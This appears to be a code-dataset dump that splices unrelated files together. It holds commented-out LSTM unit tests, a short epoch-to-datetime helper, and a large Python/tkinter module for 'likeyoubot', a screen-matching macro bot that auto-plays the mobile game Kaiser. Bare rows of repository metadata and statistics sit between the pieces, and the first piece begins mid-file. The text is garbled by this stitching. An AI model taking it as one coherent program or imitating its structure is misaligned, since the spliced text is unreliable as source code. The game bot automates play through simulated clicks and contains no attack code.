# """
# input_shape: [1, 2, 9]
# weight_shape: [1, 52, 9]
# recurrence_weight_shape: [1, 52, 13]
# bias_shape: [1, 104]
# output_shape: [1, 1, 2, 13]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.08447232888329703, 0.6786879671317316, 0.6558691737892577]
# activation_beta = [0.7615097936520958, 0.5651098460911419, 0.2265325436094976]
# activations = ['sigmoid', 'relu', 'tanh']
# clip = 6.4355391083683635
# direction = "forward"
# hidden_size = 13
# input_forget = 14
# rtr = np.load('swig/result/LSTM/test_LSTM_9/test_LSTM_9_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
# #@unittest.skip("FAIL")
# def test_LSTM_10(self):
# """
# input_shape: [9, 6, 2]
# weight_shape: [2, 8, 2]
# recurrence_weight_shape: [2, 8, 2]
# bias_shape: [2, 16]
# output_shape: [9, 2, 6, 2]
# """
# np_X = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_X.npy')
# np_W = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_W.npy')
# np_R = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_R.npy')
# np_B = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_B.npy')
# np_sequence_lens = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_sequence_lens.npy')
# np_initial_h = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_initial_h.npy')
# np_initial_c = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_initial_c.npy')
# np_P = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_P.npy')
# dc_X = dc.array(np_X.flatten().tolist()).reshape(np_X.shape)
# dc_W = dc.array(np_W.flatten().tolist()).reshape(np_W.shape)
# dc_R = dc.array(np_R.flatten().tolist()).reshape(np_R.shape)
# dc_B = dc.array(np_B.flatten().tolist()).reshape(np_B.shape)
# dc_sequence_lens = dc.array(np_sequence_lens.flatten().tolist()).reshape(np_sequence_lens.shape)
# dc_initial_h = dc.array(np_initial_h.flatten().tolist()).reshape(np_initial_h.shape)
# dc_initial_c = dc.array(np_initial_c.flatten().tolist()).reshape(np_initial_c.shape)
# dc_P = dc.array(np_P.flatten().tolist()).reshape(np_P.shape)
# activation_alpha = [0.5494076090797351, 0.4486022544214028, 0.8555569145519173, 0.36385914141140563, 0.2786060330869964, 0.3709594247211093]
# activation_beta = [0.6841038069275263, 0.12454085979724905, 0.16010194778825715, 0.43645368358634684, 0.2006827543226236, 0.025382308479808713]
# activations = ['relu', 'tanh', 'relu', 'sigmoid', 'sigmoid', 'tanh']
# clip = 7.52494780016543
# direction = "bidirectional"
# hidden_size = 2
# input_forget = 19
# rtr = np.load('swig/result/LSTM/test_LSTM_10/test_LSTM_10_Y.npy')
# dcr = dc.lstm(dc_X, dc_W, dc_R, dc_B, dc_sequence_lens, dc_initial_h, dc_initial_c, dc_P)
# np.testing.assert_allclose(rtr.flatten(), np.array(dcr[0].data()).astype(np.float32), rtol=1e-3, atol=1e-3)
def tearDown(self):
return "test finished"
if __name__ == '__main__':
unittest.main()
| 56.307888
| 151
| 0.696778
| 3,655
| 22,129
| 3.898222
| 0.059097
| 0.106682
| 0.063167
| 0.101067
| 0.750983
| 0.732664
| 0.730769
| 0.729787
| 0.728313
| 0.727049
| 0
| 0.122405
| 0.135749
| 22,129
| 392
| 152
| 56.451531
| 0.622588
| 0.850423
| 0
| 0
| 0
| 0
| 0.164518
| 0.149932
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.138889
| 0.027778
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
50ea26c99c47921997d55ce7ce6bf1c073fe937e
| 191
|
py
|
Python
|
src/brightnessmonitorclient/raspberry/timeConvert.py
|
BrightnessMonitor/BrightnessMonitorClient
|
dbd75f7152dd8f6f646cf2aadbaed79d3a2396ac
|
[
"MIT"
] | null | null | null |
src/brightnessmonitorclient/raspberry/timeConvert.py
|
BrightnessMonitor/BrightnessMonitorClient
|
dbd75f7152dd8f6f646cf2aadbaed79d3a2396ac
|
[
"MIT"
] | null | null | null |
src/brightnessmonitorclient/raspberry/timeConvert.py
|
BrightnessMonitor/BrightnessMonitorClient
|
dbd75f7152dd8f6f646cf2aadbaed79d3a2396ac
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import datetime
# converts given seconds passed since 1 Jan 1970
# back into readable time
def convertback(seconds):
return datetime.datetime.fromtimestamp(seconds)
| 27.285714
| 51
| 0.790576
| 26
| 191
| 5.807692
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.136126
| 191
| 7
| 51
| 27.285714
| 0.884848
| 0.47644
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
50f3775393351d0553bb1135bea70827de70a843
| 42,929
|
py
|
Python
|
likeyoubot_kaiser.py
|
dogfooter-master/dogfooter
|
e1e39375703fe3019af7976f97c44cf2cb7ca0fa
|
[
"MIT"
] | null | null | null |
likeyoubot_kaiser.py
|
dogfooter-master/dogfooter
|
e1e39375703fe3019af7976f97c44cf2cb7ca0fa
|
[
"MIT"
] | null | null | null |
likeyoubot_kaiser.py
|
dogfooter-master/dogfooter
|
e1e39375703fe3019af7976f97c44cf2cb7ca0fa
|
[
"MIT"
] | null | null | null |
import likeyoubot_game as lybgame
import likeyoubot_kaiser_scene as lybscene
from likeyoubot_configure import LYBConstant as lybconstant
import time
import sys
import tkinter
from tkinter import ttk
from tkinter import font
import copy
class LYBKaiser(lybgame.LYBGame):
work_list = [
'게임 시작',
'로그인',
'자동 사냥',
'메인 퀘스트',
'지역 퀘스트',
'퀵슬롯 등록',
'퀘스트',
'우편',
'일괄 분해',
'알림',
'[반복 시작]',
'[반복 종료]',
'[작업 대기]',
'[작업 예약]',
'' ]
nox_kaiser_icon_list = [
'nox_kaiser_icon'
]
momo_kaiser_icon_list = [
'momo_kaiser_icon'
]
character_move_list = [
"↑",
"↗",
"→",
"↘",
"↓",
"↙",
"←",
"↖"
]
slot_item_list = [
'없음',
'소형 체력 물약',
'중형 체력 물약',
'속도의 물약',
'전투의 물약',
'증폭 마법석',
'펫 소환 주문서',
]
def __init__(self, game_name, game_data_name, window):
lybgame.LYBGame.__init__(self, lybconstant.LYB_GAME_KAISER, lybconstant.LYB_GAME_DATA_KAISER, window)
def process(self, window_image):
rc = super(LYBKaiser, self).process(window_image)
if rc < 0:
return rc
return rc
def custom_check(self, window_image, window_pixel):
pb_name = 'skip'
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
self.window_image,
self.resource_manager.pixel_box_dic[pb_name],
custom_below_level=(130, 130, 130),
custom_top_level=(255, 255, 255),
custom_threshold=0.9,
custom_flag=1,
custom_rect=(560, 240, 600, 280)
)
if loc_x != -1:
self.logger.warn('건너뛰기: ' + str(match_rate))
self.mouse_click(pb_name)
# 패배!
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'defeat_press_key_loc',
# custom_below_level=(250, 250, 250),
# custom_top_level=(255, 255, 255),
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(280, 190, 360, 230)
# )
# if loc_x != -1:
# self.logger.warn('전투 패배: ' + str(match_rate))
# self.mouse_click('defeat_press_key_0')
return ''
def get_screen_by_location(self, window_image):
scene_name = self.scene_init_screen(window_image)
if len(scene_name) > 0:
return scene_name
scene_name = self.popup_scene(window_image)
if len(scene_name) > 0:
return scene_name
# scene_name = self.jeontoo_scene(window_image)
# if len(scene_name) > 0:
# return scene_name
# scene_name = self.scene_google_play_account_select(window_image)
# if len(scene_name) > 0:
# return scene_name
return ''
def popup_scene(self, window_image):
loc_name = 'popup_scene_loc'
match_rate = self.rateMatchedResource(self.window_pixels, loc_name, custom_below_level=100, custom_top_level=255)
self.logger.debug(loc_name + ' ' + str(match_rate))
if match_rate > 0.7:
return 'popup_scene'
return ''
# def jeontoo_scene(self, window_image):
# (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
# self.window_image,
# 'jeontoo_scene_loc',
# custom_below_level=(100, 100, 100),
# custom_top_level=(255, 255, 255),
# custom_threshold=0.7,
# custom_flag=1,
# custom_rect=(5, 90, 80, 130)
# )
# if match_rate > 0.7:
# return 'jeontoo_scene'
# return ''
def scene_init_screen(self, window_image):
loc_x = -1
loc_y = -1
if self.player_type == 'nox':
for each_icon in LYBKaiser.nox_kaiser_icon_list:
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[each_icon],
custom_threshold=0.8,
custom_flag=1,
custom_rect=(80, 110, 570, 300)
)
# print('[DEBUG] nox yh icon:', (loc_x, loc_y), match_rate)
if loc_x != -1:
break
elif self.player_type == 'momo':
for each_icon in LYBKaiser.momo_kaiser_icon_list:
(loc_x, loc_y), match_rate = self.locationOnWindowPart(
window_image,
self.resource_manager.pixel_box_dic[each_icon],
custom_threshold=0.8,
custom_flag=1,
custom_rect=(30, 10, 610, 300)
)
# print('[DEBUG] momo yh icon:', (loc_x, loc_y), match_rate)
if loc_x != -1:
break
if loc_x == -1:
return ''
return 'init_screen_scene'
def scene_google_play_account_select(self, window_image):
loc_x_list = []
loc_y_list = []
(loc_x, loc_y) = lybgame.LYBGame.locationOnWindow(
window_image,
self.resource_manager.pixel_box_dic['google_play_letter']
)
loc_x_list.append(loc_x)
loc_y_list.append(loc_y)
for i in range(6):
(loc_x, loc_y) = lybgame.LYBGame.locationOnWindow(
window_image,
self.resource_manager.pixel_box_dic['google_play_letter_' + str(i)]
)
loc_x_list.append(loc_x)
loc_y_list.append(loc_y)
for each_loc in loc_x_list:
if each_loc == -1:
return ''
else:
continue
return 'google_play_account_select_scene'
def clear_scene(self):
last_scene = self.scene_dic
self.scene_dic = {}
for scene_name, scene in last_scene.items():
if ( 'google_play_account_select_scene' in scene_name or
'logo_screen_scene' in scene_name or
'connect_account_scene' in scene_name
):
self.scene_dic[scene_name] = last_scene[scene_name]
def add_scene(self, scene_name):
self.scene_dic[scene_name] = lybscene.LYBKaiserScene(scene_name)
self.scene_dic[scene_name].setLoggingQueue(self.logging_queue)
self.scene_dic[scene_name].setGameObject(self)
class LYBKaiserTab(lybgame.LYBGameTab):
def __init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name=lybconstant.LYB_GAME_KAISER):
lybgame.LYBGameTab.__init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name)
def set_work_list(self):
lybgame.LYBGameTab.set_work_list(self)
for each_work in LYBKaiser.work_list:
self.option_dic['work_list_listbox'].insert('end', each_work)
self.configure.common_config[self.game_name]['work_list'].append(each_work)
def set_option(self):
###############################################
# 메인 퀘스트 진행 #
###############################################
# frame = ttk.Frame(self.inner_frame_dic['frame_top'], relief=self.frame_relief)
# label = tkinter.Label(
# master = frame,
# text = "메인 퀘스트를 ",
# anchor = tkinter.W,
# justify = tkinter.LEFT,
# font = lybconstant.LYB_FONT
# # fg='White' if brightness < 120 else 'Black',
# # bg=bg_colour
# )
# # countif.place(
# # x=lybconstant.LYB_PADDING,
# # y=lybconstant.LYB_PADDING,
# # width=lybconstant.LYB_LABEL_WIDTH, height=lybconstant.LYB_LABEL_HEIGHT
# # )
# label.pack(side=tkinter.LEFT)
# option_name_mq = lybconstant.LYB_DO_STRING_DURATION_MAIN_QUEST
# self.option_dic[option_name_mq] = tkinter.StringVar(frame)
# self.option_dic[option_name_mq].trace('w', lambda *args: self.callback_main_quest_stringvar(args, option_name=option_name_mq))
# if not option_name_mq in self.configure.common_config[self.game_name]:
# self.configure.common_config[self.game_name][option_name_mq] = 20
# entry = tkinter.Entry(
# master = frame,
# relief = 'sunken',
# textvariable = self.option_dic[option_name_mq],
# justify = tkinter.RIGHT,
# width = 5,
# font = lybconstant.LYB_FONT
# )
# entry.pack(side=tkinter.LEFT)
# label = tkinter.Label(
# master = frame,
# text = "분 동안 진행합니다.",
# justify = tkinter.LEFT,
# font = lybconstant.LYB_FONT
# # fg='White' if brightness < 120 else 'Black',
# # bg=bg_colour
# )
# label.pack(side=tkinter.LEFT)
# frame.pack(anchor=tkinter.W)
# PADDING
frame = ttk.Frame(
master = self.master,
relief = self.frame_relief
)
frame.pack(pady=5)
self.inner_frame_dic['options'] = ttk.Frame(
master = self.master,
relief = self.frame_relief
)
self.option_dic['option_note'] = ttk.Notebook(
master = self.inner_frame_dic['options']
)
self.inner_frame_dic['common_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['common_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['common_tab_frame'], text='일반')
self.inner_frame_dic['work_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['work_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['work_tab_frame'], text='작업')
self.inner_frame_dic['notify_tab_frame'] = ttk.Frame(
master = self.option_dic['option_note'],
relief = self.frame_relief
)
self.inner_frame_dic['notify_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
self.option_dic['option_note'].add(self.inner_frame_dic['notify_tab_frame'], text='알림')
# ------
# 일반 탭 좌측
frame_l = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_label = ttk.LabelFrame(frame_l, text='설정')
frame_label_inner = ttk.LabelFrame(frame_label, text='소형 체력 물약')
frame = ttk.Frame(frame_label_inner)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'].trace(
'w', lambda *args: self.callback_auto_potion_set(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set')
)
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '물약 소진시 현재 작업 종료',
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_set'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = self.get_option_text("물약 슬롯 번호")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'].trace(
'w', lambda *args: self.callback_auto_potion_number(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number')
)
combobox_list = []
for i in range(1, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'] = 1
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'auto_potion_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label_inner.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label_inner = ttk.LabelFrame(frame_label, text='수동 체력 물약')
frame = ttk.Frame(frame_label_inner)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'] = tkinter.BooleanVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'].trace(
'w', lambda *args: self.callback_potion_set(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set')
)
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'] = False
check_box = ttk.Checkbutton(
master = frame,
text = '물약 소진시 현재 작업 종료',
variable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_set'],
onvalue = True,
offvalue = False
)
check_box.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = self.get_option_text("수동 회복 물약 사용(HP %)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'].trace(
'w', lambda *args: self.callback_potion_hp(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp')
)
combobox_list = []
for i in range(50, 91):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'] = 70
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_hp'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label_inner)
label = ttk.Label(
master = frame,
text = self.get_option_text("수동 회복 물약 슬롯 번호")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'].trace(
'w', lambda *args: self.callback_potion_number(args, lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number')
)
combobox_list = []
for i in range(1, 5):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'] = 2
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_CONFIG + 'potion_number'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label_inner.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_l.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 일반 탭 중간
frame_m = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_m.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 일반 탭 우측
frame_r = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
frame_r.pack(side=tkinter.LEFT, anchor=tkinter.NW)
# 작업 탭 좌측
frame_l = ttk.Frame(self.inner_frame_dic['work_tab_frame'])
frame_label = ttk.LabelFrame(frame_l, text='자동 사냥')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("진행 시간(초)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'].trace(
'w', lambda *args: self.callback_auto_play_duration(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration')
)
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'] = 1800
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_play_duration'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 전환 감지 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'].trace(
'w', lambda *args: self.callback_auto_limit_count(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count')
)
combobox_list = []
for i in range(2, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'auto_limit_count'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_l, text='메인 퀘스트')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("진행 시간(초)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'].trace(
'w', lambda *args: self.callback_main_quest_duration(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration')
)
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'] = 1800
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_duration'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("퀘스트 지역 이탈 판정 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'].trace(
'w', lambda *args: self.callback_main_quest_distance(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance')
)
combobox_list = []
for i in range(1, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'] = 3
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_distance'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 전환 감지 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'].trace(
'w', lambda *args: self.callback_main_quest_auto(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto')
)
combobox_list = []
for i in range(2, 101):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'] = 5
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'main_quest_auto'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
frame.pack(anchor=tkinter.NW)
frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
frame_label = ttk.LabelFrame(frame_l, text='지역 퀘스트')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("진행 시간(초)")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'].trace(
'w', lambda *args: self.callback_local_quest_duration(args, lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration')
)
combobox_list = []
for i in range(0, 86401, 60):
combobox_list.append(str(i))
if not lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration' in self.configure.common_config[self.game_name]:
self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'] = 1800
combobox = ttk.Combobox(
master = frame,
values = combobox_list,
textvariable = self.option_dic[lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'],
state = "readonly",
height = 10,
width = 5,
font = lybconstant.LYB_FONT
)
combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_KAISER_WORK + 'local_quest_duration'])
combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
